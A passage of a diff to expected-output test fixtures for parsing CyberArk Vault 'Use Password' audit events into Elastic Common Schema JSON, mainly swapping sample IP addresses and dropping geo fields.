"country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -460,7 +424,7 @@ }, "@timestamp": "2021-03-11T17:54:49.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -472,8 +436,8 @@ ], "ip": [ "10.0.2.2", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { @@ -481,20 +445,20 @@ "severity": "Info", "reason": "Because I say so", "iso_timestamp": "2021-03-11T17:54:49Z", - "gateway_station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:54:49\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:54:49Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eBecause I say so\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:54:49\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:54:49Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eBecause I say so\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Use Password", "issuer": "Administrator", "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", "station": "10.0.2.2", "action": "Use Password", @@ -508,8 +472,8 @@ "event": { "severity": 2, "reason": "Because I say so", - "ingested": "2021-06-09T10:24:32.348999900Z", - "original": "\u003c5\u003e1 2021-03-11T17:54:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:54:49\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:54:49Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eBecause I say so\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:54:49\",\"IsoTimestamp\":\"2021-03-11T17:54:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Because I say so\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"81.32.170.205\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:52.374510200Z", + "original": "\u003c5\u003e1 2021-03-11T17:54:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:54:49\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:54:49Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eBecause I say so\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:54:49\",\"IsoTimestamp\":\"2021-03-11T17:54:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Because I say so\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.13\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", "action": "use password", @@ -532,20 +496,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -568,7 +523,7 @@ }, "@timestamp": "2021-03-11T17:56:30.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -580,8 +535,8 @@ ], "ip": [ "10.0.2.2", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { @@ -589,20 +544,20 @@ "severity": "Info", "reason": "for fun", "iso_timestamp": "2021-03-11T17:56:30Z", - "gateway_station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:56:30\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:56:30Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003efor fun\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:56:30\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:56:30Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003efor fun\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Use Password", "issuer": "Administrator", "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", "station": "10.0.2.2", "action": "Use Password", @@ -616,8 +571,8 @@ "event": { "severity": 2, "reason": "for fun", - "ingested": "2021-06-09T10:24:32.349002400Z", - "original": "\u003c5\u003e1 2021-03-11T17:56:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:56:30\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:56:30Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003efor fun\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:56:30\",\"IsoTimestamp\":\"2021-03-11T17:56:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"for fun\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"81.32.170.205\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:52.374516Z", + "original": "\u003c5\u003e1 2021-03-11T17:56:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:56:30\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:56:30Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003efor fun\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:56:30\",\"IsoTimestamp\":\"2021-03-11T17:56:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"for fun\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.13\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", "action": "use password", @@ -640,20 +595,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -676,7 +622,7 @@ }, "@timestamp": "2021-03-11T20:23:17.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -688,8 +634,8 @@ ], "ip": [ "10.0.2.2", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { @@ -697,20 +643,20 @@ "severity": "Info", "reason": "testing", "iso_timestamp": "2021-03-11T20:23:17Z", - "gateway_station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 12:23:17\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T20:23:17Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003etesting\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating 